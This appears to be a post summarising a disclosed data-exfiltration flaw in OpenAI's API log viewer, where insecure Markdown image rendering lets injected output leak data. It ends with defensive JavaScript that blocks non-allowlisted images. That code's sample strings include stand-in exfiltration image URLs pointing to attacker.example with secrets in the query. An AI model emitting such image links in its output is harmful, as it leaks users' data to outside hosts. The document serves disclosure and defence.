OpenAI API Logs: Unpatched data exfiltration
3 months ago
- #Data Exfiltration
- #OpenAI
- #API Security
- OpenAI's API log viewer is vulnerable to data exfiltration, exposing apps and agents using OpenAI APIs.
- The vulnerability involves insecure Markdown image rendering in API logs, risking sensitive data exposure.
- OpenAI closed the vulnerability report as 'Not applicable' after multiple follow-ups.
- The attack chain demonstrates how malicious Markdown images can exfiltrate data via OpenAI's log viewer.
- Systems built with OpenAI's 'responses' and 'conversations' APIs, including Agent Builder and Assistants, are affected.
- Preview interfaces for testing AI tools also exhibit insecure Markdown rendering, expanding the attack surface.
- Alternative defenses like content security policies can be bypassed when logs are reviewed in OpenAI's platform.
- The responsible disclosure process ended with the report being deemed 'Non-Applicable' by OpenAI.
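
A defender-side check for the rendering issue summarized above, as an added example that is not from OpenAI or the original report: before a log or preview UI renders model output as Markdown, it rewrites every image whose host is not allowlisted so the browser never fetches it. The allowlisted host, the function names and the sample strings are constructed assumptions.

```javascript
// Added example, not OpenAI's code. Host allowlist and names are assumptions.
const ALLOWED_IMAGE_HOSTS = new Set(["cdn.example.internal"]);

// ![alt] optionally followed by an inline (url "title") destination.
const MD_IMG = /!\[([^\]]*)\](\(\s*<?([^\s)>]+)>?[^)]*\))?/g;
const HTML_IMG = /<img\b[^>]*>/gi;

function isAllowed(rawUrl) {
  let u;
  try { u = new URL(rawUrl); } catch { return false; } // relative or malformed
  return u.protocol === "https:" && ALLOWED_IMAGE_HOSTS.has(u.hostname);
}

// Break the scheme so the blocked URL stays readable but is never linkified.
const defang = (url) => url.replace(/^(\w+):\/\//, "$1[:]//");

function neutralizeImages(text) {
  const blocked = [];
  let out = text.replace(MD_IMG, (m, alt, inline, url) => {
    if (inline === undefined) {
      // Reference-style or shortcut image: escaping "!" downgrades it to a
      // plain link, which is not fetched automatically on render.
      blocked.push(m);
      return "\\" + m;
    }
    if (isAllowed(url)) return m;
    blocked.push(url);
    return `(blocked image "${alt}": ${defang(url)})`;
  });
  // Raw HTML images are dropped outright; a log viewer has no need for them.
  out = out.replace(HTML_IMG, (m) => {
    blocked.push(m);
    return "(blocked html image)";
  });
  return { text: out, blocked };
}

// Constructed sample of model output as it might appear in a stored log entry.
const sample = [
  "Done. ![status](https://attacker.example/p.png?d=SECRET123)",
  "![logo](https://cdn.example.internal/logo.png)",
  '![x][r1] <img src="https://attacker.example/t.gif">',
  "[r1]: https://attacker.example/q.png?d=abc",
].join("\n");
```

Regex matching does not cover every Markdown edge case; in a real viewer the same allowlist check belongs in the renderer's image handler, with the `blocked` list sent to monitoring.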